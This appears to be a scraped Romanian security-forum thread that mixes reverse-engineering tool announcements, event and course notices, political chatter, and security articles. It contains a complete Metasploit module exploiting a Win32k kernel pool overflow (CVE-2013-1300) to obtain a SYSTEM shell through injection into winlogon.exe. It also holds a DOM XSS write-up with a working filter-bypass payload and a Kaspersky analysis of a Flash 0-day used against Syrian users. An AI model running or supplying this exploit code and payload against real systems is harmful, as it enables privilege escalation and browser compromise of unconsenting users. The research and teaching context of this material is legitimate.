Nytro

ILSpy is the open-source .NET assembly browser and decompiler. Development started after Red Gate announced that the free version of .NET Reflector would cease to exist by end of February 2011. ILSpy requires the .NET Framework 4.0. Important links: Discussion forum Issue Tracker ILSpy plugin list Build server [h=2]ILSpy Features[/h] Assembly browsing IL Disassembly Support C# 5.0 "async" Decompilation to C# Supports lambdas and 'yield return' Shows XML documentation [*]Decompilation to VB [*]Saving of resources [*]Save decompiled assembly as .csproj [*]Search for types/methods/properties (substring) [*]Hyperlink-based type/method/property navigation [*]Base/Derived types navigation [*]Navigation history [*]BAML to XAML decompiler [*]Save Assembly as C# Project [*]Find usage of field/method [*]Extensible via plugins (MEF) [*]Assembly Lists [h=2]Screenshots[/h] Viewing IL (Build 199) Navigating Types (Build 199) Saving Resources (Build 199) Decompiling a Type to C# (Build 199) Decompiling method with 'yield return' (Build 528) Sursa: ILSpy

[h=1]Tangerine[/h] Tangerine is a tool for inspecting Windows Phone applications. Based on XAPSpy. It allows you to do three things: Automate all routine work with XAP files (parsing, deploying etc.) Log method calls, including parameters values and return values Run your own code on method enter, on method exit or instead of a method Change parameters values using method code Supports both Windows Phone 7 and Windows Phone 8 applications. Current limitations on functions for instrumentating: only managed application assemblies get instrumented does not support functions with user types (e.g. custom type Product) does not support out parameters does not support method overloads Minimum requirements: .NET Framework 4.0, Windows Phone SDK 7.0 More detailed documentation will be uploaded. Contributors: Andrey Chasovskikh Evgeny Bechkalo Dmitriy Evdokimov Sursa: https://github.com/andreycha/tangerine

[h=3]Save valuable time[/h] Spending too much time trying to figure out issues in your app's user interface? Use XAML Spy, and you will know the answer in minutes. [h=3]Real-time[/h] XAML Spy provides a real-time view of your app's state. Examine and modify the properties of any element on-the-fly and see the changes reflected immediately in the running app. [h=3]No more secrets[/h] Do you want to browse files in the isolated storage? Want access to the UI automation tree? Need to understand your app's visual tree? Use XAML Spy, it's all there. [h=3]Platform support[/h] With full Silverlight, Windows Phone, Windows Store and WPF support, XAML Spy is here to help you get your app to the market quickly. No matter whether you are developing for the desktop, web, mobile or tablet. [h=3]Proven technology[/h] XAML Spy uses and extends the Silverlight Spy technology. Silverlight Spy is the defacto standard for visually debugging Silverlight and Windows Phone apps. Silverlight Spy users will notice many similarities and enjoy a great number of new features and improvements. [h=3]Evaluate[/h] Are you into Silverlight, Windows Phone. Windows Store or WPF app development? Try XAML Spy for free and see how it can assist you in understanding how your app really works. Download: XAML Spy Sursa: XAML Spy

[h=2].NET Reflector 8[/h] [h=2]Look inside any .NET code[/h] ?Debugging your application Follow bugs through your application to see where your problems lie – whether it's in your own code, third-party libraries, or components used by your application. [*]?Understand how applications work Inherited applications with little or no documentation or comments are hard to develop. Use .NET Reflector to understand how the code runs and avoid bugs. [*]?SharePoint and other third-party platforms Like many third-party platforms, SharePoint APIs and libraries aren't always well-documented. With .NET Reflector you can look inside their assemblies and see how they work and which APIs you can call. Download: .NET Reflector - Download Sursa: .NET Reflector - Understand and debug any .NET code

ImgMount Tool v.1.0.15 Description: Mounts FFU Image file as a virtual hard drive. After an image is mounted, Windows partitions can be accessed like a regular volume. Usage: ImgMount <ImageFile> Supported images: - FFU v.2.0 (Lumia 920, Lumia 820 ...) Supported OS: - Windows 7 - Windows 8 - Windows XP not supported Attached Files [TABLE] [TR] [TD][/TD] [TD]ImgMount.zip - [Click for QR Code] (49.2 KB, 6127 views)[/TD] [/TR] [/TABLE] Sursa: (FFU) ImgMount Tool v.1.0.15 - xda-developers

[h=2]Try JustDecompile[/h] The free .NET decompiler that helps you recover lost source code or peer into assemblies Proven 10 times faster than competitors 72 hours support through our forums [h=4]Download JustDecompile for free[/h] Download installer Sursa: JustDecompile Download

Pe 2 iunie, 2014 începând cu ora 19:00 TechHub Bucharest g?zduie?te a treia edi?ie Sparks, eveniment ce î?i propune s? adune speciali?ti ?i pasiona?i din domeniul securit??ii informatice pentru a discuta despre cele mai noi amenin??ri la adresa infrastructurilor ce le de?inem, construim sau administr?m. A treia edi?ie debuteaz? cu Ionut Popescu, Penetration Tester la KPMG cu prezentarea “Introduction to shellcode development” ?i Vali-Marius Malinoiu, Technical Expert la SparkWare Technologies ce va prezenta un studiu intitulat “Thief vs Hacker: Hacker went fishing”. Info: Sparks #3 » Sparks

Liceanul ce sparge serverele NASA Mihai Badici mai 17, 2014 Una din legendele urbane autohtone este cea a liceanului genial care a reu?it s? sparg? serverele unor institu?ii de prestigiu, cel mai adesea NASA. Nu ?tiu de ce serverele NASA apar cel mai adesea în aceste pove?ti; presupun c? adev?rata “performan??” ar fi s? penetrezi un server al NSA sau FBI înainte de a î?i bate la poart? un desant de masca?i c?lare pe un F16, îns? de la aselenizare încoace NASA a r?mas în imaginarul colectiv ca depozitara ultim? a înaltei tehnologii. Evident, agen?ia chiar dispune de tehnologii de vârf ?i are contribu?ii însemnate în lumea IT, dat fiind specificul activit??ii. Totu?i, obiectul ei de activitate este explorarea spa?iului, nicidecum administrarea de servere, iar restric?iile bugetare de dup? terminarea r?zboiului rece ( ce se va întâmpla acum, dup? începerea celui de-al doilea, r?mâne de aflat) s-au v?zut ?i în activitatea ei. Drept pentru care putem presupune c? institu?ia nu exagereaz? cu cheltuielile în domeniu, cum poate c? o f?cea odinioar?. Oricine administreaz? un server cu acces public ?tie c? zi de zi orice serviciu instalat este supus atacurilor de tot felul, log-urile acestora sunt pline de astfel de înregistr?ri. Majoritatea acestora sunt mai degrab? benigne, e vorba de atacuri de tip “brute-force” la parolele diverselor conturi. Mecanismul e simplu: exist? dic?ionare de useri ?i parole; atacatorul porne?te un program care le va încerca pe toate cele din dic?ionar. Dac? parola dumneavoastr? este 1234, va reu?i în câteva minute, dac? nu, va încerca iar ?i iar. Un alt tip de atacuri, un pic mai sofisticat, se bazez? pe vulnerabilit??i cunoscute. De exemplu, atacatorul ?tie c? WordPress, platforma pe care e construit Contributors, are o vulnerabilitate în versiunea x. Cineva a scris un “exploit”, adic? un program care ?tie s? profite de aceast? vulnerabilitate, iar atacatorul va folosi acest exploit pur ?i simplu prin încercare pe orice server care ruleaz? un serviciu web. Dac? merge, bine, dac? nu, trecem la urm?torul. Ideea este c? toate aceste atacuri nu implic? o mare pricepere din parta atacatorului. E drept c? trebuie s? fie relativ familiarizat cu func?ionarea Internetului, s? ?tie s? foloseasc? un scaner de porturi, dar în esen?? el va rula un program scris de altcineva, disponibil pe “pia?a neagr?” a Internetului, eventual la schimb cu alte informa?ii. “Genialul licean” trebuie doar s? aib? la dispozi?ie un computer ?i o conexiune la Internet bun?. In plus mult, mult timp liber, eventual cu binecuvântarea p?rin?ilor convin?i c? faptul c? lipse?te de la orele de Limba Român? îl vor ajuta în viitoarea carier? de informatician. De cealalt? parte a baricadei , administratorul de sistem este un om ocupat, mai ales c? reducerile bugetare probabil c? l-au afectat ?i pe el. In teorie, el ?tie c? o anumit? versiune a unui software este vulnerabil?, îns? este supus mai multor condi?ion?ri. Este posibil ca upgrade-ul s? necesite o serie de teste premerg?toare care necesit? timp, sau poate c? o anumit? aplica?ie nu func?ioneaza pe versiunea nou? ?i trebuie rescris o parte din cod. Poate pur ?i simplu are o alt? opera?iune critic? în desf??urare ?i a amânat upgrade-ul cu dou? zile. Sau poate c? firma care de?ine serverul nu ?i-a pl?tit contractul de mentenan?? drept pentru care administratorul a decis s? nu mai aplice patch-urile. Evident c? în aceast? confruntare, cei care au mai mult timp de obicei câ?tig?. Ori, atacatorii sunt mul?i ( dup? cum ar?tam anterior, nu trebuie s? ?tii prea multe) ?i au o gr?mad? de timp la dispozi?ie. Spre deosebire de administratori, care sunt lega?i de o organiza?ie ?i supu?i constrângerilor acesteia, ei nu dau socoteal? nim?nui ?i nu au altceva mai bun de f?cut. Din acest motiv, orice plan bun de securitate pleac? de la ipoteza c? o astfel de situa?ie se va întâmpla la un moment dat ?i se axeaz? (?i) pe m?surile de luat în astfel de eventualit??i. Publicul îns? este avid de astfel de ?tiri. Uneori poli?ia ajunge la poarta atacatorului dup? primele scan?ri, atunci când atacatorul este suficient de naiv încât s? atace un server guvernamental de la adresa proprie de IP. De aici, de la ?în?ar pân? la arm?sar e doar un pas, iar de la gura satului pân? la titlul mare din ziar despre înc? un tân?r genial care a spart (din nou) un server NASA, nici m?car atât. Sursa: Liceanul ce sparge serverele NASA | Contributors

[h=1]Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)[/h] ## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'msf/core/post/windows/reflective_dll_injection' require 'rex' class Metasploit3 < Msf::Exploit::Local Rank = GreatRanking include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Post::Windows::Process include Msf::Post::Windows::FileInfo include Msf::Post::Windows::ReflectiveDLLInjection def initialize(info={}) super(update_info(info, { 'Name' => 'Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)', 'Description' => %q{ A kernel pool overflow in Win32k which allows local privilege escalation. The kernel shellcode nulls the ACL for the winlogon.exe process (a SYSTEM process). This allows any unprivileged process to freely migrate to winlogon.exe, achieving privilege escalation. Used in pwn2own 2013 by MWR to break out of chrome's sandbox. NOTE: when you exit the meterpreter session, winlogon.exe is likely to crash. }, 'License' => MSF_LICENSE, 'Author' => [ 'Nils', #Original Exploit 'Jon', #Original Exploit 'Donato Capitella <donato.capitella[at]mwrinfosecurity.com>', # Metasploit Conversion 'Ben Campbell <ben.campbell[at]mwrinfosecurity.com>' # Help and Encouragement ], 'Arch' => ARCH_X86, 'Platform' => 'win', 'SessionTypes' => [ 'meterpreter' ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Targets' => [ [ 'Windows 7 SP0/SP1', { } ] ], 'Payload' => { 'Space' => 4096, 'DisableNops' => true }, 'References' => [ [ 'CVE', '2013-1300' ], [ 'MSB', 'MS13-053' ], [ 'URL', 'https://labs.mwrinfosecurity.com/blog/2013/09/06/mwr-labs-pwn2own-2013-write-up---kernel-exploit/' ] ], 'DisclosureDate' => 'Dec 01 2013', 'DefaultTarget' => 0 })) end def check os = sysinfo["OS"] unless (os =~ /windows/i) return Exploit::CheckCode::Unknown end file_path = expand_path("%windir%") << "\\system32\\win32k.sys" major, minor, build, revision, branch = file_version(file_path) vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}") case build when 7600 return Exploit::CheckCode::Vulnerable when 7601 if branch == 18 return Exploit::CheckCode::Vulnerable if revision < 18176 else return Exploit::CheckCode::Vulnerable if revision < 22348 end end return Exploit::CheckCode::Unknown end def exploit if is_system? fail_with(Exploit::Failure::None, 'Session is already elevated') end if sysinfo["Architecture"] =~ /wow64/i fail_with(Failure::NoTarget, "Running against WOW64 is not supported") elsif sysinfo["Architecture"] =~ /x64/ fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported") end unless check == Exploit::CheckCode::Vulnerable fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system") end print_status("Launching notepad to host the exploit...") notepad_process_pid = cmd_exec_get_pid("notepad.exe") begin process = client.sys.process.open(notepad_process_pid, PROCESS_ALL_ACCESS) print_good("Process #{process.pid} launched.") rescue Rex::Post::Meterpreter::RequestError print_status("Operation failed. Hosting exploit in the current process...") process = client.sys.process.open end print_status("Reflectively injecting the exploit DLL into #{process.pid}...") library_path = ::File.join(Msf::Config.data_directory, "exploits", "cve-2013-1300", "schlamperei.x86.dll") library_path = ::File.expand_path(library_path) print_status("Injecting exploit into #{process.pid}...") exploit_mem, offset = inject_dll_into_process(process, library_path) thread = process.thread.create(exploit_mem + offset) client.railgun.kernel32.WaitForSingleObject(thread.handle, 5000) client.sys.process.each_process do |p| if p['name'] == "winlogon.exe" winlogon_pid = p['pid'] print_status("Found winlogon.exe with PID #{winlogon_pid}") if execute_shellcode(payload.encoded, nil, winlogon_pid) print_good("Everything seems to have worked, cross your fingers and wait for a SYSTEM shell") else print_error("Failed to start payload thread") end break end end end end Sursa: http://www.exploit-db.com/exploits/33213/ Info: https://labs.mwrinfosecurity.com/blog/2013/09/06/mwr-labs-pwn2own-2013-write-up---kernel-exploit/

Scrie chiar acolo pe pagina: "Note: For those of you interested, as of August 2012, my database has grown to over 60 million domain names. I am now offering this domain list for purchase."

Yougetsignal are o mare baza de date IP-domeniu, nu cauta pe bing.

Din cate stiu eu, din cazul unui prieten, nu a mai platit abonamentul si nu a avut probleme cu justitia/bancile sau mai stiu eu ce, doar ca cei din familia sa, TOTI, nu mai aveau dreptul sa isi faca abonament la compania respectiva. Cred ca Vodafone era.

Factura nu e obligatorie. O sa iti zica "aduci cand mai treci pe aici". Zici ca nu ai la tine si gata. Nu am inteles exact ce vrei sa zici. "numai" sau "nu mai"? Si de ce sa te dea in judecata?

Ce ar putea sa se posteze in acea categorie? E prea "mic" domeniul in legatura cu securitatea IT.

[h=1]Security Summer School[/h] From „Voodoo“ to „You Do“ via hex and fun. Proudly brought to you by ACS, Ixia and Hexcellents. [h=2]Period[/h] 23rd of June - 10th of August 2014 [h=2]Links[/h] Wiki Facebook page Google Plus page E-mail contact address [h=2]Summary[/h] The first edition of a new Security Summer School focused on Practical Software Exploitation will take place between June 23rd and August 10th 2014, at the Faculty of Automatic Control and Computers, University POLITEHNICA of Bucharest. Students will be go through an in-depth tour of what it means to discover, successfully exploit and patch a software vulnerability and develop the necessary skills and insights needed to embark on such an endeavor. Activities will take place during two intensive training sessions per week as well as two Capture the Flag (CTF) contests that will be held mid-term and at the end of the summer school. The final CTF contest will be the highlight of the summer school and students will able to showcase the skills they have learned and be awarded prizes offered by Ixia. [h=2]Application[/h] We welcome students to apply via Stagii pe Bune. Choose „Security Summer School“ under the „Summer Schools“ heading, for the company „Facultatea de Automatica si Calculatoare, UPB“. Apart from filling out your CV, we want to see your h4x0r sk111z by solving set of three challenges. Please download the challenge tasks, go through the README and then submit your solution on this Google form; you may edit your submission if you forget something during the first try. The deadline for submitting your answers is Sunday, May 25th. After May 25th we will organize a set of interviews to decide who will take place in the Security Summer School. [h=3]Requirements[/h] We expect good programming skills and a fair knowledge of C programming language. Python and shell scripting skills are welcome. More than anything we expect a proactive attitude, a love for challenges and „tinkering“ and the interest in security and hacking. [h=2]Location & Schedule[/h] The Security Summer School will take place in Faculty of Automatic Control and Computers, University POLITEHNICA of Bucharest, room EG106 (Ixia lab), first floor, EG wing. Activities will take place twice a week: Monday, 4pm-8pm Thursday, 9am-1pm Each session will be highly practical: a presentation of a set of basic concepts on slides follow by hands-on activities (tutorials and tasks). The 9th-10th of August week-end is reserved for the final CTF contest and awards ceremony. [h=2]Syllabus[/h] Introduction into the World of Security 23rd of June: crash course CTF, OS (pmap, strace, ltrace, file descriptors, lsof, ldd), Linux dinamic analysis 26th of June: assembly intro: registers, mnemonics, the stack, gdb (step instruction/read-only) Binary Formats 30th of June: writing assembly, executable code analysis (IDA) 3rd of July: from ELF to a process, PLT, PIC ? gdb / IDA [*] Vulnerability Assessment 7th of July: overwrite data in GDB, overflow of allkinds: function pointers, vtable, local variables, format string, use after free 10th of July: CTF Demo (4 challenge tasks) [*] Vulnerability Discovery 14th of July: stateless fuzzing (on files), fuzzer + gdb 17th of July: stateful fuzzing (on protocol) [*] Weaponizing the vulnerability 21st of July: shellcode + stack, NUL terminator, call trampoline 24th of July: DEP, ASLR [*] Weaponizing the vulnerability II 28th of July: information leak, canary value, format strings 31st of July: ROP, remote + socket reuse [*] Preventing vulnerabilities in your own code + Windows 4th of August: secure programming techniques (sanitizing, system()) 7th of August: Windows: shell code exploit on windows (Immunity, WinDbg) [h=2]Team[/h] Adrian ?endroiu Dan Gioga Drago? Com?neci Radu Caragea R?zvan Crainea R?zvan Deaconescu Silviu Popescu Tudor Azoi?ei [h=3]Supporting members[/h] Irina Pre?a Lucian Cojocar Vlad Dumitrescu In case of any inquiries please send us an e-mail. Sursa: Security Summer School [Wiki-ul Departamentului de Calculatoare]

Ma pis pe Ucraina. Dar totul pana la Rep. Moldova sau Romania.

Ar trebui sa fim indeajuns de civilizati incat sa nu inceapa un razboi, mai ales ca la armele nucleare din ziua de azi nu e nevoie de mare lucru ca sa "dispara" cateva tari. Eu imi fac ceva griji, pentru Romania si Republica Moldova, in privinta rusilor pentru ca sunt capabili de multe lucruri.

https://www.youtube.com/watch?feature=player_embedded&v=NJmi_QCbYGU + http://site.oasteafiara.net/2012/01/ce-ar-fi-daca-ati-recunoaste-ca.html

Fara a face vreo referire la conflictul ruso-ucrainian, cred ca si Romania se apropie de un conflict cu Rusia. Incet, incet. Rogozin: România a închis spa?iul aerian pentru avionul meu. Autorit??ile române nu comenteaz? informa?ia: Rogozin: România a închis spa?iul aerian pentru avionul meu. Autorit??ile române nu comenteaz? informa?ia | adevarul.ro Suntem in NATO, SUA ar trebui sa ne ia apararea, dar tare sunt curios daca vor face asta. Daca "ataca" Republica Moldova, ar trebui sa luam in considerare un conflict. Desi Ucraina si Republica Moldova sunt "pe jumatate" rusi (nici chiar asa), eu ma gandesc ca relatia noastra cu Rusia nu va fi tocmai una de prietenie. As fi curios, daca avem membri din Republica Moldova, care locuiesc acolo, sa ne spuna care este situatia.

Sa salvati si voi undeva discutiile. De pe HY nu vorbeste nimeni? PS: Probabil ar fi fost mai interesant pe TeamSpeak.

[h=1]An Experiment In Performing Remote Calls on x64[/h] Posted on May 4, 2014 by admin Recently I was trying to do something more than just executing code in the context of a remote process: I wanted to call a function remotely, including supplying arguments, and have the program continue execution afterwards. What I will present in this post is what I have quickly come up with to achieve the task. There certainly are edge cases (discussed at the end) where the code will run into issues, but the general logic of it is Suspend all threads in the target process. This is achieved in the code with a call to the NtSuspendProcess native API. Allocate space in the process that will contain the x64 assembly code which will set up the parameters and stack to perform the call. Save all registers that will be used in performing the call. The example code does not save flags, but a full implementation will want to do that as well. Write in the parameters following the Windows x64 ABI (first four parameters in RCX, RDX, R8, and R9) respectively, with the rest on the stack. The caller will have to know and supply the stack offset to the other parameters. Set up the trampoline to perform the call. Resume the process via NtResumeProcess and let the call happen. Save the result of the call and continue execution. Articol: An Experiment In Performing Remote Calls on x64 | RCE Endeavors

Mic? antologie a patriotismului am?rât Andrei Ple?u Am publicat ?i cu alte prilejuri textele de mai jos. Simt nevoia s? le reamintesc cititorilor, într-un moment în care trîmbi?ele unui patriotism rudimentar, l?ut?resc, ?îfnos, au reaprins spiritele. Patriotismul a ajuns s? fie un amestec indigest de vorbe l?cr?moase ?i încrunt?turi de grot?. Pentru campionii lui, patria nu trebuie „ajutat?” decît cu lingu?eli ?i jocuri de bicep?i. Ideea c? o po?i iubi cu disperare, întristat de relele care o desfigureaz? (?i care, nu odat?, vin din noi în?ine) e prea subtil? pentru l?tr?torii de parad?, convin?i c? a te gudura servil în poala ??ri?oarei e modul optim de a o sluji, cînd, de fapt, e un soi de r?zgîi mai curînd dezonorant. În general, profesioni?tii retoricii patriotarde sunt, mai curînd, oameni f?r? identitate, incapabili de ispr?vi cu adev?rat ziditoare ?i, tocmai de aceea, dornici s? se salveze identificîndu-se cu str?mo?i mai f?lo?i. Gigi luat în sine nu e nimic. Dar Gigi ca „urma?” al lui ?tefan cel Mare, sau ca veri?or al lui Brâncu?i începe s? cread? c? exist?… Citeste mai mult: adev.ro/n53au0

[h=1]Reverse DOM XSS[/h] by Pedro Laguna on May 4, 2014 I came recently with an idea about how to exploit a DOM XSS vulnerability that it might be worth sharing here so others can use this trick, adapt it and defeat some poor filters with a little of JavaScript and some creativity. During an engagement I found a piece of code similar to this one: <a href="#" onclick="goToWebsite(this, 'url', '/ShowInfo.php?id=[INJECTION]&category=CARS');"> The code behind goToWebsite was something like this: function goToWebsite(e, param, base) { window.location = base + param + "=" + actionURL.value; } It’s a very clear example of DOM XSS where we can control the flow of the page using the window.location element. But why it wasn’t a reflected XSS? Well, they have some filters in place. Double quotes ( ‘”‘ ), brackets ( ‘<’ and ‘>’ ) and even semicolon ( ‘;’ ) where filtered so we couldn’t escape from the injection point, having to dig deeper into the goToWebsite function to find our way into executing arbitrary JavaScript. Lucky for us we were still allowed to use some characters that were necessary for this trick, like parenthesis ( ‘(‘ and ‘)’ ), quotes ( ”’ ) and dots ( ‘.’ ). For a DOM XSS attack we need to modify the address where the window.location is going to navigate and make it go to javascript: URL handler. But, in this case we couldn’t write directly as the injection is happening in the middle of a string, which contains some reference to a relative URL: “/ShowInfo.php?id=“ How do we overcome this problem? Well, we cannot escape from the function call but as we can insert quotes and parenthesis we can modify the string that is received by the goToWebsite function like this: <a href="#" onclick="goToWebsite(this, 'url', '/ShowInfo.php?id='.split('').reverse().join('').concat('&category=CARS');"> These function (split, reverse and join) will reverse the string ‘/ShowInfo.php?id=‘ to be ‘=di?php.ofnIwohS/‘. And we are using concat to make the code valid and as it’s at the end of the result string we don’t care about modifying it. So now we need to insert our payload, the classic alert(1): <a href="#" onclick="goToWebsite(this, 'url', '/ShowInfo.php?id=//)1(trela:tpircsavaj'.split('').reverse().join('').concat('&category=CARS');"> Now, if we execute that code, the resulting string will be: javascript:alert(1)//=di?php.ofnIwohS/&category=CARS Perfe… wait! What’s this? Code is not being executed! We have managed to insert our javascript payload at the beginning of the string passed to window.location but the code is not being executed. A closer look at the generated code on the page revealed the mystery: %2f%2f)1(trela%3Atpircsavaj'.split('').reverse().join('').concat(' Key characters as slash ( ‘/’ ) and colon ( ‘:’ ) were encoded, so our code wasn’t able to executed. Time to think how to bypass the encoding of these characters. JavaScript has the ability to replace a character inside a string like: replace(‘old’, ‘new’) so I thought I could use String.fromCharCode to bypass the character limitations and make my code execute, replacing ‘/’ and ‘:’ by two other characters that are not URLEncoded like ‘~’ and ‘+’ but it was a problem: comma character was also URL encoded so I couldn’t use the replace function. Time for the second trick! Apparently, in JavaScript, you can split a string by a character and then use another character to join the strings together, like this: 'abc-def'.split('-').join('!') After being executed this will render abc!def The best part? We are not using any forbidden characters! Just again our old friends quotes and parenthesis. If we put everything together we have something like this in order to exploit this DOM XSS bug: ~~)1(trela+tpircsavaj'.split('').reverse().join('').split('~').join(String.fromCharCode(47)).split('+').join(String.fromCharCode(58))).concat(' That way I was able to execute JavaScript code in this particular scenario without using any forbidden char. I am pretty sure you will not find yourself in this exact situation in the future but hopefully you can use these two little tricks someday! Sursa: Reverse DOM XSS | Pentura Labs's Blog

New Flash Player 0-day (CVE-2014-0515) used in watering-hole attacks Vyacheslav Zakorzhevsky Kaspersky Lab Expert In mid-April we detected two new SWF exploits. After some detailed analysis it was clear they didn't use any of the vulnerabilities that we already knew about. We sent the exploits off to Adobe and a few days later got confirmation that they did indeed use a 0-day vulnerability that was later labeled as CVE-2014-0515. The vulnerability is located in the Pixel Bender component, designed for video and image processing. We received a sample of the first exploit on April 14, while a sample of the second came on April 16. The first exploit was initially recorded by KSN on April 9, when it was detected by a generic heuristic signature. There were numerous subsequent detections on April 14 and 16. In other words, we succeeded in detecting a previously unknown threat using heuristics. According to KSN data, these exploits were stored as movie.swf and include.swf at an infected site. The only difference between the two pieces of malware is their shellcodes. It should be noted that the second exploit (include.swf) wasn't detected using the same heuristic signature as the first, because it contained a unique shellcode. Each exploit comes as an unpacked flash video file. The Action Script code inside was neither obfuscated nor encrypted. As is usually the case with this kind of exploit, the first stage is a heap spray - preparing the dynamic memory for exploitation of the vulnerability. The exploits are also designed to check the OS version. If Windows 8 is detected, a slightly modified byte-code of the Pixel Bender component is used. A fragment of the vulnerable Pixel Bender code (the data in the red box is changed according to system version) Fragment of the decompiled exploit code Next comes the actual exploitation of the vulnerability, namely modification of one of the indices in the table of methods/virtual functions. Interestingly, both exploits have two shellcodes. The first is similar in both applications; it is quite short and prepares the memory for the successful functioningof the second shellcode. A fragment of the first shellcode debugged in WinDBG Firstly, the current memory is marked as read, write and execute with the API function VirtualProtect, and then additional memory is allocated using VirtualAlloc. The second shellcode is copied to this memory and control is transferred to it. The initialization of API functions and transfer of the control to the second shellcode appear in red boxes in the screenshot above. The exploits' second shellcodes differ significantly. The exploit that we detected first has a standard shellcode (movie.swf). It performs a search of system libraries in the memory, and then downloads and runs the payload. Unfortunately, the link turned out to be inactive at the time of our research. Fragment of the movie.swf exploit's second shellcode responsible for the download and launch of the payload In the other exploit - include.swf - the second shellcode was unusual. It receives the base DLL address for flash10p.ocx, searching it for specific fragments and interacts with the ciscompeaddin5x0 - Cisco MeetingPlace Express Add-In version 5x0. This add-in is used by web-conference participants to view documents and images from presenter's screen. It should be noted that the exploit will not work if the required versions of Adobe Flash Player ActiveX and Cisco MPE are not present on the system. Fragment of the include.swf exploit's second shellcode It appears that part of the information for the exploit include.swf is passed on from outside. According to KSN data, the referer to include.swf points to another SWF file: stream.swf. At the same time, the referer of the first exploit - movie.swf - points to index.php located in the same folder as the exploit (see below). We couldn't establish the exact payload of the exploit include.swf due to a lack of data relayed from the landing page and/or other exploits. We are sure that all these tricks were used in order to carry out malicious activity against a very specific group of users without attracting the attention of security solutions. We believe that the Cisco add-in mentioned above may be used to download/implement the payload as well as to spy directly on the infected computer. Both the exploits detected by us spread from a site located at ???? ??????? ???????? ??????. The site was launched back in 2011 by the Syrian Ministry of Justice and was designed as an online form for citizens to complain about law and order violations. We believe the attack was designed to target Syrian dissidents complaining about the government. The site was hacked in September 2013, something the alleged hacker announced on his twitter account. The link to these exploits is as follows: http://jpic.gov.sy/css/images/_css/***********. When we entered the site, the installed malware payloads were already missing from the "_css" folder. We presume the criminals created a folder whose name doesn't look out of place on an administration resource, and where they loaded the exploits. The victims were probably redirected to the exploits using a frame or a script located at the site. To date, April 28, the number of detections by our products has exceeded 30. They were detected on the computers of seven unique users, all of them in Syria, which is not surprising considering the nature of the site. Interestingly, all the attacked users entered the website using various versions of Mozilla Firefox. It's likely that the attack was carefully planned and that professionals of a pretty high caliber were behind it. The use of professionally written 0-day exploits that were used to infect a single resource testifies to this. Moreover, while the first exploit is pretty standard and can infect practically any unprotected computer, the second exploit (include.swf) only functions properly on computers where Adobe Flash Player 10 ActiveX and Cisco MeetingPlace Express Add-In are installed. The Flash Player Pixel Bender component, which Adobe no longer supports, was used as the attack vector. The authors were counting on the developers not finding a vulnerability in that component and that the exploit would remain active for longer. All this suggests that the attackers were not targeting users en masse. We detect such exploits by AEP technology as PDM:Exploit.Win32.Generic and by heuristics as HEUR:Exploit.SWF.CVE-2014-0515.gen. Sursa: https://www.securelist.com/en/blog/8212/New_Flash_Player_0_day_CVE_2014_0515_used_in_watering_hole_attacks